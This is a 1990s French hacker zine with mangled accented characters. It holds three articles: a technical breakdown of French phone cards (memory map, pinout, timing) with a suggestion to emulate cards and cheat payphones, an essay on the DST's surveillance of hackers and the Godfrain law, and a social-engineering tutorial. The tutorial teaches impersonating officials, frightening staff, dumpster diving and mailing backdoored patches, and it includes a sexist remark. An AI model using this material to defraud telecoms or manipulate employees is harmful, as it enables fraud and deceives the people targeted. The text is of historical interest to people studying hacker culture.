||
La carte est s‚par‚e en deux zones la premiere de 96 bits ets dites "Zone
|
||
constructeur" la deuxieme etant la "zone de transaction", jusque l… tout le
|
||
mond suit ? pas de probl‚me?
|
||
Les deux zones sont en acces libre pour la lecture, vous pouvez donc voir ce
|
||
qui y est ‚crit sans probleme. La zone transaction peut etre ecrite, mais on
|
||
ne peut ‚crire que des 0 (technologie des eproms) ce qui revient … d‚biter des
|
||
unit‚es, meme Regis c'est rendu compte que c'‚tait pas vraiement interessant.
|
||
La zone constructeur est elle proteg‚e par un fusible qui grille apres la
|
||
premiere programmation, donc on peut plus ‚crire meme des 0. OK ca va??
|
||
|
||
Voila la map memory d'une carte t‚l‚phonique:
|
||
|
||
Bytes Bits Binary Hexa
|
||
|
||
+-----------+-----+
|
||
1 1 --> 8 | | | ---> Code personnalis‚.
|
||
+-----------+-----+
|
||
2 9 --> 16 | 0000 0011 | $03 | ---> T‚l‚carte
|
||
+-----------+-----+
|
||
3 17 --> 24 | | |
|
||
+-----------+-----+
|
||
4 25 --> 32 | | |
|
||
+-----------+-----+
|
||
5 33 --> 40 | | |
|
||
+-----------+-----+
|
||
6 41 --> 48 | | |
|
||
+-----------+-----+
|
||
7 49 --> 56 | | |
|
||
+-----------+-----+
|
||
8 57 --> 64 | | |
|
||
+-----------+-----+
|
||
9 65 --> 72 | | |
|
||
+-----------+-----+
|
||
10 73 --> 80 | | |
|
||
+-----------+-----+
|
||
11 81 --> 88 | 0001 0000 | $10 |
|
||
+-----------+-----+
|
||
12 89 --> 96 | 0001 0011 | $13 | ---> 120 unit‚s
|
||
| 0000 0110 | $06 | ---> 50 unit‚s
|
||
| 0000 0101 | $05 | ---> 40 unit‚s (plus utilis‚)
|
||
+-----------+-----+
|
||
13-31 97 --> 248 | | | ---> Zone de transaction ou chaque
|
||
| | | bit represente une unit‚
|
||
| | |
|
||
| | |
|
||
| | |
|
||
| | |
|
||
| | |
|
||
+-----------+-----+
|
||
32 249 --> 256 | 1111 1111 | $FF | ---> Carte vide
|
||
+-----------+-----+
|
||
|
||
En voila assez pour la partie logicielle, on va voir comment on peu acceder
|
||
aux donn‚es.
|
||
|
||
|
||
|
||
|
||
Afnor (Franco-Francais) ISO (Internatinnal)
|
||
En haut … gauche Milieu Gauche
|
||
(abandonn‚ de puis peu)
|
||
|
||
-------------+------------- -------------+-------------
|
||
| 8 | 4 | | 1 | 5 |
|
||
| | | | | |
|
||
+-------\ | /-------+ +-------\ | /-------+
|
||
| 7 +----+----+ 3 | | 2 +----+ + 6 |
|
||
| | | | | | | |
|
||
+--------| |--------+ +--------| |--------+
|
||
| 6 | | 2 | | 3 | | 7 |
|
||
| + +----+ | | +----+----+ |
|
||
+-------/ | \-------+ +-------/ | \-------+
|
||
| 5 | 1 | | 4 | 8 |
|
||
| | | | | |
|
||
-------------+------------- -------------+-------------
|
||
|
||
|
||
PINOUT: 1 : Vcc = 5V 5 : Gnd (0V)
|
||
2 : R/W(Lire='1':Ecrire='0')6 : Vpp = 21V (Tension de prog)
|
||
3 : Clock (Horloge) 7 : I/O (Entr‚e/Sortie)
|
||
4 : Reset 8 : Fusible
|
||
|
||
|
||
- Time diagrams:
|
||
|
||
+21V _____________
|
||
+5V____________________________________| |_________________ Vpp
|
||
: :
|
||
+5V ___________________:_____________:_________________ Reset
|
||
0V ________________| : :
|
||
: : :
|
||
+5V ____ : ____ : ______:______
|
||
0V ___| |_______:_____| |________:______| : |__________ Clock
|
||
: : : : : : : : :
|
||
+5V : : : : : :______:______: : _
|
||
0V ___:____:_______:_____:____:________| : |______:__________ R/W
|
||
: : : : : : : : :
|
||
+5V : : :_____: :________: : : :__________
|
||
0V XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out
|
||
: : : : : :<-----><---->: :
|
||
: : : : : :10 to 10 to :
|
||
: : : : : :50 ms 50ms :
|
||
Reset Bit 1 Bit2 Ecriture Bit 3
|
||
|
||
|
||
Vous avez donc tous les ‚l‚ments en main pour comprendre le fonctionnement de
|
||
la carte, dans un prochain num‚ro, il y aura un lecteur/ecriveur de carte et
|
||
peut etre un "Simulateur de carte t‚l‚phonique reprogrammable … volont‚".
|
||
|
||
Pour r‚pondre … vos questions voici l'extrait d'un petit dialogue qui a eu
|
||
lieu il y a deja quelque temps chez FB apres un d‚tour au bar Le Terminus:
|
||
|
||
Si on peut ecrire sur la carte c'est super on peut rajouter des unit‚s!
|
||
ARGHH! On peut ‚crire que des zeros donc d‚duire des unit‚s!
|
||
|
||
Comment on fait pour ecrire des '1'?
|
||
Il faut effacer l'eprom aux UV
|
||
|
||
Ben on fait ca ! non?
|
||
Ben la resine qu'il y a sur puce est anti UV
|
||
|
||
On enlŠve la r‚sine!
|
||
En admettant que tu puisses enlever la resine sans endommager le chip, tu
|
||
efface TOUT y compris la zone constructeur, que tu ne peux re‚crire puisque
|
||
le fusible a ‚t‚ grill‚!!!!
|
||
|
||
On remet le fusible!
|
||
Bien sur avec tes petits doigts habiles tu recable une connextion de 5 æm
|
||
ca y ait MD tu as trouv‚ le system :-(
|
||
|
||
Le moyen n'est pas l…, il faut faire croire … la cabine qu'elle est en
|
||
presence d'une vraie carte... Que pensez vous d'une RAM avec quelques compos
|
||
logique autours??? Voila a vous de vous d‚brouiller j'ai donn‚ l'id‚e g‚n‚rale
|
||
il ne vous manque plus que la r‚alisation! Rendez vous dans le prochain
|
||
num‚ro......
|
||
[Addendum de chieur de service, je me suis nomm‚ NeurAlien, vous avez remarque
|
||
que l'on est repass‚ du systŠme de tambour (vous savez: inserez la carte et
|
||
rabatez le couvercle) … un systŠme normal sans tambour. Bien sur, le tambour
|
||
servait … ‚viter que les trains de cables puissent etre faits. Alors ya des
|
||
Ueber-Phreakers qui ont fait des fausses cartes avec des composants en CMS.
|
||
Et donc comme tout tenait sur une carte, FT=bais‚ car plus de train de cables.
|
||
Donc eux aussi ont rus‚: Ils ont un systŠme genre reflectomŠtre qui si au lieu
|
||
d'etre en contact direct avec la carte, il y a quelques centimetre de cable qui
|
||
les menes jusqu'aux contacts normaux d'une vraie carte: ca foire, la carte est
|
||
rejet‚e! Alors je sais pas comment ils ont fait ca mais en tout cas c'est
|
||
assez chaud. hehe, je suis pas ‚lectronicien mais on m'a dit que ca se faisait
|
||
facilement. ++NeurAlien]
|
||
|
||
Merci … Marc d'avoir passe quelques heures dans certains fichiers de config, …
|
||
EFZ TEAM de faire vivre ce zine, et … XXXXX pour mon defunt acces INET.
|
||
[je protŠge les innocents, pas de pseudos connus et identifiables ds N0 WAY]
|
||
D. O'CONNELL A.K.A. HOPPY
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.9
|
||
|
||
|
||
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
|
||
diffuse publiquement.
|
||
PS: ca date, maintenant l'underground informatique est bien d‚velopp‚ mais non
|
||
encore interconnect‚.
|
||
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
= CORE-DUMP | Volume I | Issue 2 | Phile 6 | [NeurAlien] 12/09/92 =
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
._ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ .
|
||
/_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ /|
|
||
:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_: |
|
||
:_: Pourquoi :_: |
|
||
:_: L'Underground Informatique:_: |
|
||
:_: est-il :_: |
|
||
:_: sous d‚velopp‚? :_: |
|
||
:_: en France :_: |
|
||
:_:_ _ _ _ _ _ _ _ _ _ _ _ _ _:_: |
|
||
:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:/'
|
||
|
||
Par NeurAlien
|
||
|
||
|
||
J'ai choisi de faire cet article sur la vie de l'Underground
|
||
Informatique Francais aprŠs avoir r‚fl‚chi au fait qu'il se cr‚ait parfois
|
||
dans des endroits trŠs recul‚s et trŠs peu ouverts du r‚seau, des petites
|
||
"iles" o— un petit groupe de hackers ou de phone phreaks se rencontrent, mais
|
||
que jamais il n'y a eu d'underground organis‚ et qui dure dans le temps
|
||
comparable … ceux form‚s aux USA ou en Allemagne.
|
||
|
||
>Qu'est-ce que l'Underground:
|
||
============================
|
||
Le concept d'underground informatique est venu en premier avec le
|
||
Chaos Computers Club de Hambourg qui a fait beaucoup de r‚flexions pouss‚es
|
||
sur les hackers et les phone phreaks.
|
||
En fait, l'Underground n'est ni un serveur, ni un journal, ni un groupe
|
||
comme les LODs ou le CCCH. L'Underground est un ensemble de relations et
|
||
d'histoires qui se r‚pŠtent et se perp‚tuent … travers des discussions et
|
||
des journaux pour H/P et ainsi, cela forme un petit "monde" totalement
|
||
virtuel avec ses propres rŠgles jamais ‚crites mais respect‚es comme
|
||
"Ne jamais effacer de donn‚e sur un systŠme d'information a part pour
|
||
couvrir sa trace". (cf: article 4 du Phrack 22 par The Mentor)
|
||
Aux USA, un vaste Underground H/P existe;form‚ de Phracks Inc, de Computer
|
||
Underground Digest, de diff‚rents groupes qui ont toujours ‚t‚s li‚s d'une
|
||
maniŠre quelconque. Il y a toujours eu un contact entre les anciens "mate"
|
||
(les meilleurs) qui se sont fait prendre ou qui se sont retir‚s et les
|
||
jeunes hackers et phone phreaks qui arrivaient dans l'Underground.
|
||
Il y a toujours eu un souci de continuit‚ de la part de l'Underground aux
|
||
USA: les anciens forment des nouveaux avant de s'en aller.
|
||
Mais pour la France? On pourrait presque dire qu'il n'y a jamais
|
||
eu d'ancien.
|
||
|
||
>Le problŠme de l'underground Francais:
|
||
======================================
|
||
L'Underground Francais n'a en fait jamais exist‚ en tant que monde
|
||
durable. De multiples petits "ilots" comme NICK au sein de MCOM, les
|
||
hackers de RIBOUREL, Les SLANS sur VMF/MOP, TeKila's Underground dans
|
||
le club TELECOMS sur RTEL ou encore "le royaume t‚l‚matique" sur la section
|
||
'PROBLEMES DE LIAISON SPECIALISE' du serveur de la DTRN ainsi que PIRATEL
|
||
sur un serveur gratuit videotext.
|
||
Tous ces micro-underground n'ont dur‚ que quelques mois tout au plus.
|
||
Bien s–r, vous me direz qu'il existe bien des serveur comme AATEL et PIRATE
|
||
sur le r‚seau x25. Mais leur plus grand problŠme est le maillage organis‚
|
||
et m‚thodique que la DST a tiss‚ sur les r‚seaux Francais.
|
||
Qu'est ce que la DST. C'est la Direction de la Surveillance du
|
||
Territoire dont une grande partie trŠs bien ‚quip‚e et trŠs bien organis‚e
|
||
s'occupe du piratage informatique.
|
||
Grƒce … leur "r‚seau" d'informateur et de surveillance, ils sont capables de
|
||
d‚tecter certaines activit‚s tendancieuses sur le r‚seau T‚l‚tel, X25,
|
||
ou mˆme RTC. (l'Internet est trŠs mal maitris‚!! h‚h‚h‚ !)
|
||
Je vais vous raconter une anecdote qui illustre bien l'‚tendue de leur
|
||
pouvoir. Suite au piratage d'une grande boite d'informatique de France, un
|
||
groupe de hacker a ‚t‚ "track‚" par la DST. Dans ce groupe, il y avait un
|
||
certain "DIEU" (le pseudonyme), tristement c‚lŠbre par son irrespect envers
|
||
tous les autres hackers. Ce dernier ‚tait recherch‚ activement et pourtant,
|
||
personne de la DST n'arrivait … le prendre.
|
||
Un jour, un connect‚ sur un petit micro-serveur RTC pris pour deconner le
|
||
pseudo DIEU. Quelques jours plus tard, deux inspecteur d‚barquaient … la
|
||
maison du SYSOP de ce micro-serveur pour savoir qui ‚tait ce fameux DIEU.
|
||
Manque de pot pour la DST, ce DIEU en question n'‚tait absolument pas le
|
||
bon!
|
||
(information suppl‚mentaire: le vrai DIEU, le hacker, a quand mˆme ‚t‚
|
||
retrouv‚ au bout de 3 ou 4 mois d'enquˆtes intensives.)
|
||
La DST a des relations partout et est r‚put‚e pour tous savoir.
|
||
Connaissez vous 1984 de George Orwell???? Vous connaissez alors BIG BROTHER.
|
||
La DST, c'est un peu ‡a mais en moins fort... N‚anmoins, vous pouvez ˆtre
|
||
sur que s'ils veulent savoir quelque chose, il seront au courant, … quelque
|
||
prix que cela leur coute... Ce sont avec les RG (renseignements g‚n‚raux) les
|
||
oreilles de l'‚tat; … part que pour la DST, il y a eu des BRAS de rajout‚s...
|
||
Quand au "cerveaux", ils ne semblent pas ˆtre … la traine dans cet outils
|
||
du pouvoir.
|
||
On comprends donc mieux pourquoi les hackers sont vite arrˆt‚s s'il
|
||
y a pleinte de port‚e.
|
||
DŠs le d‚but, lors d'une affaire de piratage informatique, c'est la DST qui
|
||
s'en occupe plus que la PJ! La DST fait alors un travail m‚thodique et
|
||
complet d'audit pour traquer le hacker. Le hacker ensuite recoit une visite
|
||
qui termine en g‚n‚ral l'enquˆte sur le hacker. L…, les inspecteurs de la
|
||
DST font "cracher" tout ce dont ils ont besoin au hacker.
|
||
Un micro lors de l'interrogatoire est sans aucun doute possible install‚.
|
||
Bien sur, les V (petit surnom pour la DST) ne se limitent pas … des questions
|
||
uniquement sur l'enquˆte en cours... Ils essayent d'avoir toutes les infos
|
||
possibles sur les autres hackers pour que cela leur facilite la tache s'ils
|
||
doivent trouver d'autre hackers.
|
||
Le mat‚riel du hacker est ensuite saisi, et hop, ils disparaissent de votre
|
||
vie, sans aucune autre trace qu'un grand manque au niveau mat‚riel et une
|
||
lourde menace si jamais on s'avisait de recommencer.
|
||
Le conseil nous est aussi donn‚ de ne pas remettre les pieds sur un serveur
|
||
avant deux mois au moins.
|
||
Apres la partie de la DST, si l'affaire … quelque chose … voir avec une
|
||
fraude ou un quelconque gain d'argent, alors vous pouvez ˆtre s–r d'avoir
|
||
une visite de la part de la PJ qui ont des m‚thodes beaucoup moins calmes
|
||
que la DST.
|
||
S'il n'y a pas eu plainte par contre mais que selon eux vous devenez trop
|
||
dangereux, alors ils font une descente chez vous, il vous font une grande
|
||
frayeur et s'arrangent pour que vous rencardiez et informiez sur les
|
||
hackers encore actifs pendant plusieurs mois, voir des ANNEES !!!
|
||
|
||
L'Underground est ainsi decim‚, et il est bien s–r impossible
|
||
de pr‚voir si vous ˆtes ou pas sur la "liste d'attente pour la casserole" de
|
||
la DST. Ainsi, il n'y a pas de moyen de v‚ritablement "transmettre" son
|
||
savoir en toute s‚curit‚.
|
||
|
||
>Les moyens et les m‚thodes de la DST:
|
||
=====================================
|
||
La DST a vraiment beaucoup de moyens pour tracker un pirate.
|
||
Par exemple, ils ont une ‚quipe de sp‚cialiste en informatique et
|
||
qui peuvent aider … tout moment les inspecteurs dans leur enquete.
|
||
Ils savent pr‚cisement comment agissent les hackers et connaissent
|
||
en g‚n‚ral leurs habitudes ( chevaux de troie - crackers de mot de
|
||
passe - worms - backdoors - passes & m‚thodes )
|
||
Si par exemple, ils ne sont pas sur qu'une personne … telle adresse
|
||
soit un hacker, ils peuvent envoyer des personnes d‚guis‚es en
|
||
femme de m‚nage (je ne suis pas parano) sans aucun problŠme. Il ont
|
||
des relations qui leur permettent d'avoir * n'importe * quelle
|
||
information provenant d'une ‚cole par le censeur ou mˆme les profs.
|
||
Les ‚coutes sont bien s–r monaie courante et ils n'ont pas besoin
|
||
faire des ‚coutes sauvages... Une carte de la DST ouvre tous les
|
||
Centres Principaux d'Exploitation sans problŠme.
|
||
Ils utilisent d'autre part une technologie de pointe au niveau de
|
||
l'espionnage informatique. Il s'agit du TEMPEST.
|
||
Le principe en est ma foi trŠs simple. Vous savez certainnement que
|
||
tout courant qui passe dans un fil ‚l‚ctrique non-blind‚ produit un
|
||
champ magn‚tique et qu'un circuit electronique en fonctionnement
|
||
possŠde des composants ‚lectroniques qui oscillent quand ils sont
|
||
dans certains ‚tats et ainsi emettent soit sur une frequence
|
||
radio‚l‚ctrique soit avec un signal ‚lectromagnique. Ces signaux
|
||
peuvent ˆtre d‚tect‚ de trŠs loin grƒce … des instruments
|
||
de haute pr‚cision. On peut trŠs bien d‚coder les caractŠres frapp‚
|
||
sur un clavier qui transitent par le cable ou bien ce qui s'affiche
|
||
sur un ‚cran.
|
||
Le TEMPEST est l'ensemble ORDINATEUR - DECODEUR - AMPLIFICATEUR -
|
||
ANTENNE qui permet de recevoir en clair les informations provenant
|
||
de l'ordinateur distant sans aucune liaison que ce soit (… part
|
||
l'air).
|
||
Ils ont l'habitude de faire du TEMPEST sur les claviers, les disques
|
||
durs, les minitels et les cables modem (jamais sur le CPU).
|
||
|
||
Quand … leurs m‚thodes, eh bien elles sont simples et efficaces
|
||
en g‚n‚ral.
|
||
Tout d'abord, il y a une surveillance constante des serveurs …
|
||
risques comme ceux des anciens pirates, des serveurs comme RTEL o—,
|
||
d'une maniŠre ou d'une autre, il s'arrangent pour "tenir" le SYSOP
|
||
et lui imposer un scan sur des mots-cles comme "hacker", "blue box"
|
||
"pirat","NUA","TRANSPAC","NUI","CC","CARTE PASTEL"du style grep(1).
|
||
Bien sur, si un club leur parait suspect, ils peuvent aussitot
|
||
passer un coup de fil au SYSOP et lui demander le Pass.
|
||
Vous pensez bien aussi que toutes les adresses laiss‚es en BAL sont
|
||
relev‚es.
|
||
(liste des serveurs ‚cout‚s & filtr‚s: QSD/The Line, RTEL, CHEZ,
|
||
TEASER et bien s–r RTEL.)
|
||
(liste des serveurs trŠs certainnements soumis … ces pratiques:
|
||
ELIOTT, POUR, PIRATE, AATEL)
|
||
Ils s'arrangent aussi pour r‚cuperer le log des appelants avec les
|
||
adresses des PAVIs correspondants aux pseudos.
|
||
Ainsi, ils ont une table approximative qui donne pour chaque pseudo le
|
||
d‚partement d'origine.
|
||
Une histoire significative de leur m‚thode est arriv‚e en
|
||
1988-1989 avec Jean Claude Michot alors SYSOP de QBBS.
|
||
Si vous vous rappelez bien, QBBS demandait l'adresse et le num‚ro de
|
||
t‚l‚phone de chaque user voulant avoir un compte. Il ‚tait pr‚cis‚ que
|
||
cela resterait confidentiel.
|
||
Mais JCM ‚tait un pirate (pas un des meilleurs), et de plus, il n'avait
|
||
pas grande morale. JCM donc s'‚tait fait prendre par la DST, et ils ont
|
||
marchand‚ un abandon des charges vis … vis de son affaire (le
|
||
troc de sa libert‚) contre le fichier d'adresse avec la correspondance
|
||
avec le pseudo.
|
||
JCM qui n'est pas trŠs respectable ni honˆte … pr‚f‚r‚ divulguer ce
|
||
fichier plut“t que d'assumer son erreur! (non pas d'avoir pirat‚, sa
|
||
seule erreur est celle de s'ˆtre fait prendre … mon sens!)
|
||
Mais je suis s–r que la DST a ‚t‚ trŠs persuasive ce qui peut quelque
|
||
peu nous permettre de le pardonner.
|
||
La DST quand elle est d‚munie de moyens de tracking contre une
|
||
personne ou un groupe s'arrange pour d'abord voir qui fait quoi (quels
|
||
pseudos sont les auteurs de tel ou tel hack) puis ensuite essaye de
|
||
voir avec quelles personnes correspondent le hacker.
|
||
Ils s'arrangent pour trouver les personnes susceptibles sur le serveur
|
||
d'avoir le num‚ro de t‚l‚phone du hacker ou ses coordonn‚es et ensuite
|
||
font une descente chez ces dites personnes.
|
||
En leur faisant vraiment trŠs trŠs peur et avec leur terrible persuasion,
|
||
ils arrivent presque toujours a faire comprendre a cette personne qu'elle
|
||
n'aura pas d'ennui si elle dit le num‚ro de tel ou tel pseudo (qui est le
|
||
hacker).
|
||
Encore une bonne raison de ne pas montrer son amiti‚ envers certainne
|
||
personne en public et une encore meilleure raison pour ne jamais, Oh grand
|
||
jamais, donner ses coordonn‚es ou son num‚ro de t‚l‚phone.
|
||
|
||
>La DST et la loi Godfrain:
|
||
==========================
|
||
Personnellement, j'en ai beaucoup voulu … la DST pour ses actions
|
||
que je trouvais injustes mais finalement, on ne peut pas trop s'attaquer
|
||
(au point de vue id‚ologique je parle) … la DST et … ses actions.
|
||
Mais la DST n'est qu'un outil du pouvoir et par pouvoir, je fais r‚f‚rence
|
||
au systŠme soit-disant "d‚mocratique" non au mouvement politique qui
|
||
pourrait ˆtre en place … ce moment. Je ne veux pas traiter de politique
|
||
ici, ce n'est absolument pas le but de ce Newsletter/Technical Journal.
|
||
Ce qui est mauvais est en fait seulement la Loi Godfrain anti-hacker.
|
||
Cette loi en effet d‚signe comme d‚lit le fait de venir sur un systˆme
|
||
d'information. Mais … ce moment, comment diff‚rencier un systŠme o— l'on
|
||
a le droit d'accŠder d'un systˆme o— cela est interdit.
|
||
Un message: "Acces … cet ordinateur interdit aux personnes non autoris‚es"
|
||
ne suffit pas … mon avis.
|
||
Qui sont les personnes non autoris‚es?
|
||
De plus, ce genre de message est g‚n‚ralement en Anglais, je ne suis
|
||
absolument pas pour la francisation de tout mais tout le monde ne comprend
|
||
pas l'anglais! [FUCK TOUBON au fait, ++NeurAlien/94]
|
||
De toute facon, la loi reste la mˆme pour les systŠmes ayant une banniŠre de
|
||
pr‚vention que pour les systŠmes sans. Ainsi, demain on peut venir m'arrŠter
|
||
pour ˆtre all‚ sur RTEL ou sur TEASER!
|
||
Est-ce normal?
|
||
A ce moment, c'est la porte ouverte … la loi de classe... En effet, une telle
|
||
loi sera applicable … toute personne et seule les personnes gˆnantes pour
|
||
l'‚tat seront vis‚es.
|
||
Dans cette vision, on aura bient“t plus besoin de justifier une arrestation.
|
||
Et pourtant ce n'est pas "1984", ce sont seulement les cons‚quences de 1988
|
||
(date du vote de cette loi).
|
||
J'aimerai interviewer les votants pour cette loi et voir s'ils mesuraient
|
||
l'ampleur de leur vote.
|
||
|
||
>CONCLUSION:
|
||
===========
|
||
Nous poss‚dons quand mˆme des moyens de nous faire entendre.
|
||
La branche active des H / P peut laisser des messages d'informations sur les
|
||
systˆmes "ouverts" et la branche m‚diatique peut informer les mass-m‚dias.
|
||
Mais l… encore, le gouvernement aura beaucoup de mal … revenir sur une de
|
||
ses erreurs et utilisera tout son pouvoir de manipulation d'opinion pour
|
||
persuader les Fran‡ais du bien fond‚ de cette loi.
|
||
Nous avons mˆme la possibilit‚ de faire un lobbie comme aux USA, un
|
||
groupe de pression et faire changer cette loi. Mais tout reste … faire et
|
||
nous ne devons pas laisser ces politicards grabataires, avides de pouvoir et
|
||
d'argent faire des lois r‚pressives donnant aux juges-pantin les pleins
|
||
pouvoirs sur nos existences.
|
||
L'image de l'underground a ‚t‚ trop souvent terni par les soci‚t‚s
|
||
ayant peur de notre capacit‚ … montrer leurs incomp‚tences et leurs
|
||
manipulations douteuses et aussi par les gouvernements voulant brider et
|
||
dominer les moyens informatique et, pour cela, les limitŠrent … leurs
|
||
technocrates et leurs industries de pointe qu'ils controlent d‚ja.
|
||
Imaginez seulement le r‚seau ‚tendu … chaque citoyen d'un pays.
|
||
Ce serait la libre discussion et avec quelques rŠgles pour rendre le r‚seau
|
||
viable, personne n'aurait plus … faire la guerre pour faire entendre son
|
||
opinion. Ne serait-ce pas l… la d‚mocratie?
|
||
|
||
Il est temps de montrer cette crasse politique et ‚conomique qui
|
||
a d‚ja s‚rieusement limit‚ l'extension de ces merveilleuses technologies.
|
||
Sensibilisez votre entourage. Montez vos propre moyens d'actions et faites
|
||
entendre votre opinion. Nous somme une force qui peut trŠs bien lib‚rer
|
||
les r‚seaux de la main-mise des soci‚t‚s et de l'‚tat.
|
||
|
||
|
||
L I B E R O N S L E S R E S E A U X ! ! !
|
||
|
||
free the net !
|
||
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.10
|
||
|
||
|
||
><
|
||
|
||
:O :o :I :! :/ L'art du social engineering :O :o :I :! :/
|
||
|
||
><
|
||
|
||
par NeurAlien
|
||
|
||
Si utile contre les grosses entreprise "… la big brother", le social
|
||
engineering permet d'attaquer un des points les plus faible de la soci‚t‚:
|
||
le personnel.
|
||
|
||
Je vais vous enseigner ici les choses que j'ai connue d'une pratique
|
||
courante et de l'enseignement de The Dude, maitre en l'art du social
|
||
engineering … Hack-Tic en Hollande.
|
||
|
||
Tout d'abord, le concept. Le social engineering couremment abrevi‚ SE
|
||
est l'art de se faire passer pour quelqu'un d'autre pour avoir des informations
|
||
sur n'importe quoi.
|
||
Pour cela, il faut etre convaicant, r‚agir comme la vraie personne et surtout
|
||
utiliser beaucoup de psychologie.
|
||
|
||
Exemple de SE classique:
|
||
Employ‚e de FT au service exterieur: "France telecom bonjour,"
|
||
Hacker: "Bonjour, Monsieur Levallois du CPE d'Orl‚ans" [Toujours essayer de
|
||
placer le maximum
|
||
d'acronymes dans la
|
||
conversation]
|
||
H: "Nous avons besoin de la liste des pr‚fixes de num‚ro vert internationaux
|
||
par pays car nous avons un problŠme avec un des carriers."
|
||
FT: "Pardon? Je ne comprends pas bien. "
|
||
H: "J'ai besoin de la liste des 0590 indiquant le pays selon le pr‚fixe!"
|
||
FT: "Attendez monsieur, je cherche... <pause> alors, Pour sprint....."
|
||
[ Et voila, c'est gagn‚ ! ]
|
||
|
||
LA REGLE ULTIME DE CET ART
|
||
|
||
Il y a une chose et une seule qui vous garantira une maitrise parfaite
|
||
des correspondants lors d'une s‚ance de SE, c'est la PRATIQUE.
|
||
On peut lire tout ce que l'on voudra sur la serrurerie, si on ne pratique pas,
|
||
on ne sera jamais un serrurier.
|
||
|
||
Donc lisez ce G-Phile avec toute l'attention que vos cellules grises
|
||
peuvent y mettre et lancez vous.
|
||
|
||
Quelques rŠgles de base:
|
||
=======================
|
||
- preparez un petit papier avant d'appeler mentionnant qui vous etes, ce que
|
||
vous voulez et preparant des reponses toutes prˆtes pour certaines questions
|
||
bateaux. Mettez au point le scenario, votre nom, ce que vous voulez.
|
||
- Toujours garder l'initiative dans la conversation: c'est vous qui posez les
|
||
questions.
|
||
- Ne pas faire du social engineering si votre voix est celle d'un jeune garcon
|
||
de 13 ans.
|
||
- ne jamais s'affoler ou raccrocher brutalement quand on vous pose un question
|
||
qui vous d‚range.
|
||
- faites le par fun si vous le voulez mais vous n'aurez jamais les meilleurs
|
||
r‚sultats si vous le faites tout le temps d'une cabine sans pr‚paration.
|
||
- plus on a d'informations pointues sur la soci‚t‚, plus le SE est possible.
|
||
Il est des fois TRES fructueux de faire les poubelles de la soci‚t‚ avant
|
||
d'essayer le SE sur ses employ‚s.
|
||
|
||
Quelques sc‚narios qui marchent:
|
||
===============================
|
||
vous pouvez vous faire passer pour
|
||
. utilisateur/acheteur
|
||
. personne connue
|
||
. urgence/flic/docteur
|
||
. questionnaire/enquˆte
|
||
. pour la presse, ca marche tres souvent mais on ne recoit pas d'information
|
||
d‚taill‚e.
|
||
Il faut aussi jouer sur les sentiments de votre correspondant:
|
||
- la peur: en cas de probleme, faites comprendre que cela peut lui attirer des
|
||
ennuis: foudres du patron, (pour l'employ‚)
|
||
fisc sur le dos, (pour le petit patron d'une PME)
|
||
arrestation, (pour un individu)
|
||
coupure du t‚l‚phone,
|
||
coupure EDF...
|
||
- plaisir: collaboration contre cadeau ex: questionnaire avec un
|
||
&greedy cadeau au bout si les reponses semblent v‚ritable en
|
||
expliquant que c'est parce beaucoup de monde ne r‚pond pas
|
||
en toute honnetet‚.
|
||
On peut aussi annoncer un FAX qui doit arriver et qui est assez confidentiel et
|
||
necessitant une r‚ponse imm‚diate.
|
||
Les bruits de bureaux en bruit de fond ou de salle d'ordinateur sont
|
||
interressant.
|
||
Etre … deux peut ˆtre utile car ainsi si il y a un probleme, vous dites:
|
||
"bon, je vous passe mon sup‚rieur mais il ne va pas ˆtre satisfait"
|
||
appuyez sur une touche du t‚l‚phone et envoyez une petite musique directement
|
||
au telephone."
|
||
Ne pas dire que vous etes de la tele: cela ne fait pas reel!
|
||
Pour un questionnaire, il peut ˆtre interressant de noyer les questions
|
||
interressantes dans un flot de question ininterressantes.
|
||
Un bon plan pour un coup de fil est:
|
||
- depart lent ou on explique bien
|
||
- des que la personne cŠde, on acc‚lŠre le rythme pour qu'elle reste dans
|
||
cet ‚tat d'esprit.
|
||
Un autre est d'envoyer des patchs constructeurs par la poste concernant des
|
||
failles de s‚curit‚ avec des backdoor dans les patchs.
|
||
On peut aussi essayer de simuler un appel de la s‚curit‚ et d'envoyer un login.
|
||
Il y a aussi la possibilit‚ de se faire passer pour la femme d'un informaticien
|
||
qui lui a demand‚ de t‚l‚charger un fichier depuis son t‚l‚phone de voiture
|
||
pour qu'il puisse aller directement … un ses rendez vous apres etre passer chez
|
||
lui prendre le fichier et qui n'arrive pas a se connecter. Enfin, se faire
|
||
passer marche souvent bien quand on dit qu'on a un probleme car les femmes sont
|
||
g‚n‚ralement prises pour des burnes en informatique.
|
||
Utilisez les idiots.
|
||
|
||
En cas de problŠme lors de la conversation:
|
||
==========================================
|
||
Si on vous demande "Pourquoi voulez vous ceci..."
|
||
2 rŠgles: - toujours r‚pondre
|
||
- emphase sur le "PARCE QUE" (psycho involved)
|
||
(r‚ponse bateau : "on en a besoin pour...." )
|
||
Montrer que si ils facilitent les choses vous rendrez les choses plus faciles
|
||
pour eux aussi.
|
||
Si votre correspondant refuse de vous r‚pondre, demandez leur superviseur
|
||
ou sup‚rieur.
|
||
|
||
Les bonnes cibles:
|
||
=================
|
||
Le SE d‚pend ‚norm‚ment de votre adaptation … la personne qui est …
|
||
l'autre bout du fil. Vous devez toujours ˆtre en position de sup‚riorit‚.
|
||
Pour cela, il faut d‚ja attaquer des personnes qui ont l'habitude de recevoir
|
||
des ordres.
|
||
|
||
Ainsi, il est pr‚f‚rable de ne pas parler … l'administrateur mais
|
||
plutot … son assistant.
|
||
|
||
Bibliographie:
|
||
=============
|
||
Pr. Zuin "The first 4/5 minutes"
|
||
Dale Carnegie "Hoz to win friends and influence people"
|
||
Baladin Press "The private handbook"
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.11
|
||
|
||
|
||
